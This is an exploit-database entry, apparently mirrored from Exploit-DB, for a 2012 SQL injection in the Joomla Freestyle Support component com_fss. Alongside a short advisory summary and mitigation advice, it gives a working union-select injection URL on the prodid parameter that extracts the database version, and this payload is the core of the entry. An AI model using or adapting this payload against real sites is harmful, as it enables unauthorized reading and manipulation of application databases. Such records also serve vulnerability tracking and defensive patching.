header-logo
Suggest Exploit
vendor:
Freestyle Support System
by:
Daniel Barragan 'D4NB4R'
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Freestyle Support System
Affected Version From: 1.9.1.1447
Affected Version To: 1.9.1.1447
Patch Exists: YES
Related CWE: N/A
CPE: a:freestyle-joomla:freestyle_support_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux(bt5)-Windows(7ultimate)
2012

Joomla Freestyle Support com_fss sqli

An SQL injection vulnerability exists in Joomla Freestyle Support component com_fss. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can potentially result in the manipulation or disclosure of application data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use parameterized queries to prevent SQL injection.
Source

Exploit-DB raw data:

 Exploit Title: Joomla Freestyle Support com_fss sqli

 Dork: N/A
 
 Date: [17-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 Vendor: http://freestyle-joomla.com
 
 Version: Version 1.9.1.1447 (last update on Oct 15, 2012)
 
 License: Commercial

 Download: http://freestyle-joomla.com/fssdownloads
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion joomla component: 

Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.

Warning: Invalid argument supplied for foreach() in 


Exploit: 
    

    SQL : SQL injection

           http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
    
  
_____________________________________________________
Daniel Barragan "D4NB4R" 2012

Navigation

Suggest Exploit

Services By CQR